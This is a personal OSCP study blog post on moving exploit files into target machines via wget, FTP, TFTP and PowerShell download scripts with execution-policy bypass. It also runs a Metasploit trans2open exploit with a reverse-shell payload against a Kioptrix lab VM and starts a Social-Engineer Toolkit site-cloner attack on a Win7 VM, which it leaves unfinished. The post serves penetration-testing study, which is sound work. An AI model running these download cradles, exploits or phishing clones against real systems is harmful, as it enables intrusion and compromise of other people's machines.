OSCP Security Technology - File Transfers(1)

OSCP Security Technology - File Transfers(1)

File Transfers
  • HTTP
  • wget
  • FTP
  • TFTP
  • Powershell
  • Metasploit

Browse the following Link:

http://192.168.1.14/exploit.php

image-20210905195530721

wget
wget http://192.168.1.14/exploit.php

image-20210905195957599

FTP

Install and start ftp service on Kali Linux.

sudo apt-get install python3-pyftpdlib
cd /var/www/html
python3 -m pyftpdlib -p 21

image-20210905201103367

Get exploit.php on windows PC.

ftp 192.168.1.14
binary
get exploit.php

image-20210905201755854

echo open 192.168.1.14 > ftp.txt
echo anonymous>> ftp.txt
echo pass>> ftp.txt
echo binary >> ftp.txt
echo exploit.php >> ftp.txt
echo bye >> ftp.txt

image-20210905204011712

msfconsole
msfconsole
use auxiliary/server/ftp
show options
exploit

image-20210905204538216

TFTP

Start tftp service on Kali Linux

atftpd --daemon --port 69 /var/www/html

image-20210905205322474

Get the file on windows pc.

echo $storage = $pwd > get.ps1
echo $webclient = New-object System.Net.Webclient >> get.ps1
echo $url = "http://192.168.1.14/exploit.php" >> get.ps1
echo $file = "exploit.php" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1

powershell.exe -Execution Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1

image-20210905210349589

echo $storage = $pwd > get.ps1&echo $webclient = New-object System.Net.Webclient >> get.ps1&echo $url = "http://192.168.1.14/exploit.php" >> get.ps1&echo $file = "exploit.php" >> get.ps1&echo $webclient.DownloadFile($url,$file) >> get.ps1
Msfconsole

Target: Kioptrix Level 1 VM

msfconsole
search trans2open
use exploit/linux/samba/trans2open
set RHOST 192.168.1.22
set payload generic/shell_reverse_tcp
show options
exploit

image-20210905220421187

image-20210905220457633

Exploiting

help
wget http://192.168.1.14/exploit.php
ls
pwd

image-20210905220737785

SET

Target: Win7 VM

setoolkit

--> 1) Social-Engineering Attacks
--> 2) Website Attack Vectors
--> 1) Java Applet Attack Method
--> 2) Site Cloner

image-20210905223515957

Generate payload.

image-20210905233640588

Browse the site from windows.

image-20210905234910441

Error occurred...

image-20210905235210277

Continue next time...

Note (pyinjector.binary):

https://gitlab.com/kalilinux/packages/set/-/blob/d9fd94cbe53940381de66e506a233c33cfb38c8a/src/payloads/set_payloads/pyinjector.binary

posted @ 2021-09-06 00:18  晨风_Eric  阅读(72)  评论(0编辑  收藏  举报